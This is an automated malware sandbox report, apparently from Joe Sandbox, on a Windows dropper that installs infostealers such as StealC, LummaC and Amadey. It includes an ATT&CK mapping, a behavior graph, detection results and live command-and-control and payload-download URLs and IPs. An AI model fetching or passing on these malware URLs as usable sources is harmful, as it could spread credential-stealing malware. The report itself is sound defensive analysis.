                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_0069DE81 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext,5_2_0069DE81

                                  Mitre Att&ck Matrix

                                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                                  Windows Management Instrumentation                                  		1
                                  DLL Side-Loading                                  		1
                                  DLL Side-Loading                                  		1
                                  Disable or Modify Tools                                  		2
                                  OS Credential Dumping                                  		2
                                  System Time Discovery                                  		1
                                  Remote Desktop Protocol                                  		11
                                  Archive Collected Data                                  		14
                                  Ingress Tool Transfer                                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                  CredentialsDomainsDefault Accounts1
                                  Native API                                  		1
                                  Scheduled Task/Job                                  		1
                                  Extra Window Memory Injection                                  		11
                                  Deobfuscate/Decode Files or Information                                  		LSASS Memory1
                                  Account Discovery                                  		Remote Desktop Protocol41
                                  Data from Local System                                  		11
                                  Encrypted Channel                                  		Exfiltration Over BluetoothNetwork Denial of Service
                                  Email AddressesDNS ServerDomain Accounts3
                                  Command and Scripting Interpreter                                  		11
                                  Registry Run Keys / Startup Folder                                  		212
                                  Process Injection                                  		4
                                  Obfuscated Files or Information                                  		Security Account Manager23
                                  File and Directory Discovery                                  		SMB/Windows Admin Shares1
                                  Screen Capture                                  		1
                                  Remote Access Software                                  		Automated ExfiltrationData Encrypted for Impact
                                  Employee NamesVirtual Private ServerLocal Accounts1
                                  Scheduled Task/Job                                  		Login Hook1
                                  Scheduled Task/Job                                  		12
                                  Software Packing                                  		NTDS259
                                  System Information Discovery                                  		Distributed Component Object Model1
                                  Email Collection                                  		4
                                  Non-Application Layer Protocol                                  		Traffic DuplicationData Destruction
                                  Gather Victim Network InformationServerCloud Accounts1
                                  PowerShell                                  		Network Logon Script11
                                  Registry Run Keys / Startup Folder                                  		1
                                  Timestomp                                  		LSA Secrets1081
                                  Security Software Discovery                                  		SSHKeylogging115
                                  Application Layer Protocol                                  		Scheduled TransferData Encrypted for Impact
                                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                  DLL Side-Loading                                  		Cached Domain Credentials13
                                  Process Discovery                                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                  Extra Window Memory Injection                                  		DCSync451
                                  Virtualization/Sandbox Evasion                                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                                  Masquerading                                  		Proc Filesystem1
                                  Application Window Discovery                                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt451
                                  Virtualization/Sandbox Evasion                                  		/etc/passwd and /etc/shadow1
                                  System Owner/User Discovery                                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron212
                                  Process Injection                                  		Network Sniffing1
                                  Remote System Discovery                                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                                  Behavior Graph

                                  Hide Legend

                                  Legend:

                                  • Process
                                  • Signature
                                  • Created File
                                  • DNS/IP Info
                                  • Is Dropped
                                  • Is Windows Process
                                  • Number of created Registry Values
                                  • Number of created Files
                                  • Visual Basic
                                  • Delphi
                                  • Java
                                  • .Net C# or VB.NET
                                  • C, C++ or other language
                                  • Is malicious
                                  • Internet
                                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583666 Sample: ebjtOH70jl.exe Startdate: 03/01/2025 Architecture: WINDOWS Score: 100 89 rabidcowse.shop 2->89 91 sexo.gofile.fun 2->91 93 5 other IPs or domains 2->93 131 Suricata IDS alerts for network traffic 2->131 133 Found malware configuration 2->133 135 Malicious sample detected (through community Yara rule) 2->135 137 23 other signatures 2->137 10 axplong.exe 2 46 2->10         started        15 ebjtOH70jl.exe 5 2->15         started        17 skotes.exe 2->17         started        19 2 other processes 2->19 signatures3 process4 dnsIp5 123 185.215.113.16, 49770, 49791, 49807 WHOLESALECONNECTIONSNL Portugal 10->123 125 github.com 140.82.121.3, 443, 49848, 49893 GITHUBUS United States 10->125 129 2 other IPs or domains 10->129 77 C:\Users\user\AppData\...\305d0bf1b2.exe, PE32 10->77 dropped 79 C:\Users\user\AppData\...\3e641862d3.exe, PE32 10->79 dropped 81 C:\Users\user\AppData\...\834ad20df2.exe, PE32 10->81 dropped 87 19 other malicious files 10->87 dropped 185 Creates multiple autostart registry keys 10->185 187 Hides threads from debuggers 10->187 189 Tries to detect sandboxes / dynamic malware analysis system (registry check) 10->189 21 client_jackbastadguy.exe 10->21         started        24 stealc_valenciga.exe 10->24         started        28 834ad20df2.exe 10->28         started        32 8 other processes 10->32 83 C:\Users\user\AppData\Local\...\axplong.exe, PE32 15->83 dropped 85 C:\Users\user\...\axplong.exe:Zone.Identifier, ASCII 15->85 dropped 191 Detected unpacking (changes PE section rights) 15->191 193 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 15->193 195 Tries to evade debugger and weak emulator (self modifying code) 15->195 197 Tries to detect virtualization through RDTSC time measurements 15->197 30 axplong.exe 15->30         started        199 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 17->199 127 185.215.113.209 WHOLESALECONNECTIONSNL Portugal 19->127 file6 signatures7 process8 dnsIp9 59 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 21->59 dropped 61 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32+ 21->61 dropped 63 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 21->63 dropped 73 61 other files (59 malicious) 21->73 dropped 34 client_jackbastadguy.exe 21->34         started        113 135.181.65.216, 49819, 49920, 80 HETZNER-ASDE Germany 24->113 115 127.0.0.1 unknown unknown 24->115 65 C:\Users\user\AppData\...\softokn3[1].dll, PE32 24->65 dropped 67 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 24->67 dropped 75 10 other files (6 malicious) 24->75 dropped 159 Antivirus detection for dropped file 24->159 161 Multi AV Scanner detection for dropped file 24->161 163 Attempt to bypass Chrome Application-Bound Encryption 24->163 177 7 other signatures 24->177 38 chrome.exe 24->38         started        69 C:\Users\user\AppData\Local\...\skotes.exe, PE32 28->69 dropped 165 Detected unpacking (changes PE section rights) 28->165 167 Tries to evade debugger and weak emulator (self modifying code) 28->167 179 3 other signatures 28->179 40 skotes.exe 28->40         started        169 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 30->169 181 2 other signatures 30->181 117 185.215.113.206 WHOLESALECONNECTIONSNL Portugal 32->117 119 home.fortth14vs.top 34.147.147.173 ATGS-MMD-ASUS United States 32->119 121 httpbin.org 34.197.122.172 AMAZON-AESUS United States 32->121 71 C:\Users\user\AppData\Local\...\defnur.exe, PE32 32->71 dropped 171 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 32->171 173 Contains functionality to start a terminal service 32->173 175 Tries to detect sandboxes and other dynamic analysis tools (window names) 32->175 183 4 other signatures 32->183 42 gold1111111111.exe 32->42         started        44 legs.exe 32->44         started        46 defnur.exe 32->46         started        48 4 other processes 32->48 file10 signatures11 process12 dnsIp13 95 sexo.gofile.fun 104.21.32.1 CLOUDFLARENETUS United States 34->95 50 cmd.exe 34->50         started        97 192.168.2.4, 443, 49723, 49724 unknown unknown 38->97 99 239.255.255.250 unknown Reserved 38->99 52 chrome.exe 38->52         started        139 Detected unpacking (changes PE section rights) 40->139 141 Tries to evade debugger and weak emulator (self modifying code) 40->141 143 Hides threads from debuggers 40->143 157 2 other signatures 40->157 101 rabidcowse.shop 172.67.156.127, 443, 49898, 49913 CLOUDFLARENETUS United States 42->101 145 Query firmware table information (likely to detect VMs) 42->145 147 Tries to harvest and steal ftp login credentials 42->147 149 Tries to harvest and steal browser information (history, passwords, etc) 42->149 103 pancakedipyps.click 188.114.97.3, 443, 49818, 49826 CLOUDFLARENETUS European Union 44->103 151 Found many strings related to Crypto-Wallets (likely being stolen) 44->151 153 Tries to steal Crypto Currency Wallets 44->153 155 Contains functionality to start a terminal service 46->155 55 chrome.exe 48->55         started        signatures14 process15 dnsIp16 57 conhost.exe 50->57         started        105 www.google.com 142.250.186.164, 443, 49854, 49858 GOOGLEUS United States 52->105 107 play.google.com 172.217.18.14, 443, 49905, 49926 GOOGLEUS United States 52->107 111 2 other IPs or domains 52->111 109 142.250.185.164 GOOGLEUS United States 55->109 process17

                                  Screenshots

                                  Thumbnails

                                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                  windows-stand

                                  Antivirus, Machine Learning and Genetic Malware Detection

                                  Initial Sample

                                  SourceDetectionScannerLabelLink
                                  ebjtOH70jl.exe63%ReversingLabsWin32.Infostealer.Tinba
                                  ebjtOH70jl.exe58%VirustotalBrowse
                                  ebjtOH70jl.exe100%AviraTR/Crypt.TPM.Gen
                                  ebjtOH70jl.exe100%Joe Sandbox ML

                                  Dropped Files

                                  SourceDetectionScannerLabelLink
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%AviraHEUR/AGEN.1320706
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%AviraTR/Crypt.TPM.Gen
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%AviraTR/Crypt.TPM.Gen
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%AviraTR/Crypt.TPM.Gen
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\stealc_valenciga[1].exe100%AviraTR/Crypt.ZPACK.Gen
                                  C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe100%AviraTR/Crypt.ZPACK.Gen
                                  C:\Users\user\AppData\Local\Temp\1004899001\am209.exe100%Joe Sandbox ML
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\gold123[1].exe100%Joe Sandbox ML
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                                  C:\Users\user\AppData\Local\Temp\1009574001\gold123.exe100%Joe Sandbox ML
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\gold1111111111[1].exe100%Joe Sandbox ML
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\stealc_valenciga[1].exe100%Joe Sandbox ML
                                  C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe100%Joe Sandbox ML
                                  C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exe100%Joe Sandbox ML
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\am209[1].exe100%Joe Sandbox ML
                                  C:\ProgramData\freebl3.dll0%ReversingLabs
                                  C:\ProgramData\mozglue.dll0%ReversingLabs
                                  C:\ProgramData\msvcp140.dll0%ReversingLabs
                                  C:\ProgramData\nss3.dll0%ReversingLabs
                                  C:\ProgramData\softokn3.dll0%ReversingLabs
                                  C:\ProgramData\vcruntime140.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\gold1111111111[1].exe66%ReversingLabsWin32.Trojan.LummaC
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\legs[1].exe96%ReversingLabsWin32.Trojan.LummaStealer
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\client_jackbastadguy[1].exe5%ReversingLabs
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\stealc_valenciga[1].exe100%ReversingLabsWin32.Trojan.StealC
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\gold123[1].exe83%ReversingLabsWin32.Trojan.LummaC
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\am209[1].exe79%ReversingLabsWin32.Trojan.Whispergate
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\liddad[1].exe45%ReversingLabsWin32.Trojan.Amadey
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\1001527001\legs.exe96%ReversingLabsWin32.Trojan.LummaStealer
                                  C:\Users\user\AppData\Local\Temp\1004899001\am209.exe79%ReversingLabsWin32.Trojan.Whispergate
                                  C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe100%ReversingLabsWin32.Trojan.StealC
                                  C:\Users\user\AppData\Local\Temp\1009574001\gold123.exe83%ReversingLabsWin32.Trojan.LummaC
                                  C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exe66%ReversingLabsWin32.Trojan.LummaC
                                  C:\Users\user\AppData\Local\Temp\1010458001\liddad.exe45%ReversingLabsWin32.Trojan.Amadey
                                  C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe5%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe63%ReversingLabsWin32.Infostealer.Tinba
                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_ARC4.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_Salsa20.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_chacha20.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_aes.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_aesni.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_arc2.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_blowfish.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_cast.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_cbc.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_cfb.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_ctr.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_des.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_des3.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_ecb.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_eksblowfish.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_ocb.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_ofb.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_BLAKE2b.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_BLAKE2s.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_MD2.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_MD4.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_MD5.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_RIPEMD160.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_SHA1.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_SHA224.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_SHA256.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_SHA384.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_SHA512.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_ghash_clmul.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_ghash_portable.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_keccak.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_poly1305.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Math\_modexp.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Protocol\_scrypt.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\PublicKey\_ec_ws.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Util\_cpuid_c.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Util\_strxor.pyd0%ReversingLabs

                                  Unpacked PE Files

                                  No Antivirus matches

                                  Domains

                                  No Antivirus matches

                                  URLs

                                  SourceDetectionScannerLabelLink
                                  .forhttpvs.top0%Avira URL Cloudsafe
                                  https://wheel.readthedocs.io/en/stable/news.html0%Avira URL Cloudsafe
                                  https://rabidcowse.shop/ve9taq_100%Avira URL Cloudmalware
                                  https://pancakedipyps.click/apiZ100%Avira URL Cloudmalware
                                  https://urllib3.readthedocs.io/en/latest/advanced-usage.html#socks-proxies0%Avira URL Cloudsafe
                                  http://185.215.113.16/Jo89Ku7d/index.php07500010%Avira URL Cloudsafe
                                  http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738100%Avira URL Cloudmalware
                                  https://rabidcowse.shop/apiN100%Avira URL Cloudmalware
                                  https://importlib-metadata.readthedocs.io/0%Avira URL Cloudsafe
                                  http://135.181.65.216/4a21a126be249f0d/vcruntime140.dll26be249f0d/nss3.dll100%Avira URL Cloudmalware
                                  https://rabidcowse.shop/apiX100%Avira URL Cloudmalware
                                  https://pancakedipyps.click/88100%Avira URL Cloudmalware
                                  https://rabidcowse.shop/apio100%Avira URL Cloudmalware
                                  https://sexo.gofile.fun/obtenciondeplaticaxxxxmiakhalifaz0%Avira URL Cloudsafe
                                  home.fortth14vs.top100%Avira URL Cloudmalware
                                  https://pancakedipyps.click///m100%Avira URL Cloudmalware
                                  http://135.181.65.216/ee45b7c5e4cb75cb.php;A100%Avira URL Cloudmalware
                                  http://185.215.113.16/Jo89Ku7d/index.php320%Avira URL Cloudsafe
                                  http://135.181.65.216/4a21a126be249f0d/nss3.dllqA;100%Avira URL Cloudmalware
                                  http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah100%Avira URL Cloudmalware
                                  http://135.181.65.216/4a21a126be249f0d/freebl3.dllkK100%Avira URL Cloudmalware
                                  http://www.dabeaz.com/ply)01R0%Avira URL Cloudsafe
                                  http://185.215.113.16/inc/legs.exe100%Avira URL Cloudmalware
                                  http://185.215.113.16/Jo89Ku7d/index.php40%Avira URL Cloudsafe

                                  Domains and IPs

                                  Contacted Domains

                                  NameIPActiveMaliciousAntivirus DetectionReputation
                                  pancakedipyps.click
                                  		188.114.97.3
                                  		truefalse
                                    		high
                                    sexo.gofile.fun
                                    		104.21.32.1
                                    		truefalse
                                      		unknown
                                      plus.l.google.com
                                      		172.217.23.110
                                      		truefalse
                                        		high
                                        play.google.com
                                        		172.217.18.14
                                        		truefalse
                                          		high
                                          github.com
                                          		140.82.121.3
                                          		truefalse
                                            		high
                                            www.google.com
                                            		142.250.186.164
                                            		truefalse
                                              		high
                                              rabidcowse.shop
                                              		172.67.156.127
                                              		truetrue
                                                		unknown
                                                home.fortth14vs.top
                                                		34.147.147.173
                                                		truefalse
                                                  		high
                                                  objects.githubusercontent.com
                                                  		185.199.108.133
                                                  		truefalse
                                                    		high
                                                    httpbin.org
                                                    		34.197.122.172
                                                    		truefalse
                                                      		high
                                                      apis.google.com
                                                      		unknown
                                                      		unknownfalse
                                                        		high

                                                        Contacted URLs

                                                        NameMaliciousAntivirus DetectionReputation
                                                        http://185.215.113.206/false
                                                          		high
                                                          .forhttpvs.toptrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          grannyejh.latfalse
                                                            		high
                                                            home.fortth14vs.toptrue
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            https://httpbin.org/ipfalse
                                                              		high
                                                              https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                                                                		high
                                                                http://185.215.113.43/Zu7JuNko/index.phpfalse
                                                                  		high
                                                                  sustainskelet.latfalse
                                                                    		high
                                                                    https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0false
                                                                      		high
                                                                      https://github.com/legendary6911331/zakaz2/releases/download/zakaz2/liddad.exefalse
                                                                        		high

                                                                        URLs from Memory and Binaries

                                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                                        https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesclient_jackbastadguy.exe, 00000017.00000002.2805577556.000002103E380000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://crl.dhimyotis.com/certignarootca.crl0client_jackbastadguy.exe, 00000017.00000003.2772828637.000002103DF12000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2774888505.000002103DF6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#client_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B4D4000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2772532063.000002103B52D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2781869058.000002103B52E000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2771472232.000002103B4EF000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731418768.000002103B53A000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2770618625.000002103B4D6000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B52B000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2779572439.000002103B52E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://wheel.readthedocs.io/en/stable/news.htmlclient_jackbastadguy.exe, 00000016.00000003.2726511930.000001FE20955000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://objects.githubusercontent.com/EGaxplong.exe, 00000005.00000002.2993013959.0000000005AB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://importlib-metadata.readthedocs.io/client_jackbastadguy.exe, 00000016.00000003.2725466300.000001FE20955000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://github.com/pypa/packagingclient_jackbastadguy.exe, 00000017.00000002.2802456538.000002103DC60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://crl.dhimyotis.com/certignarootca.crlKclient_jackbastadguy.exe, 00000017.00000003.2775796167.000002103E1D8000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765175375.000002103E1D8000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2780984597.000002103E1D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.accv.es/legislacion_c.htm;client_jackbastadguy.exe, 00000017.00000003.2776479073.000002103E13C000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2772007681.000002103E117000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2780836385.000002103E144000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765290817.000002103E117000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://blog.jaraco.com/skeletonclient_jackbastadguy.exe, 00000016.00000003.2725466300.000001FE20955000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://tools.ietf.org/html/rfc3610client_jackbastadguy.exe, 00000017.00000003.2765070001.000002103DF8F000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2784511291.000002103DFA9000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2788433493.000002103DF70000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764413126.000002103DF7D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2772828637.000002103DF70000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2785362407.000002103DF70000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2773846005.000002103DF97000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2778318404.000002103DF70000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2774888505.000002103DF70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://crl.securetrust.com/SGCA.crl38client_jackbastadguy.exe, 00000017.00000002.2799879587.000002103B4DA000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2770618625.000002103B4D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://github.com/pypa/.github/blob/main/CODE_OF_CONDUCT.mdclient_jackbastadguy.exe, 00000016.00000003.2726511930.000001FE20955000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://urllib3.readthedocs.io/en/latest/advanced-usage.html#socks-proxiesclient_jackbastadguy.exe, 00000017.00000002.2806408945.000002103EAF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://185.215.113.16/Jo89Ku7d/index.phpncodedaxplong.exe, 00000005.00000002.2993013959.0000000005AB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
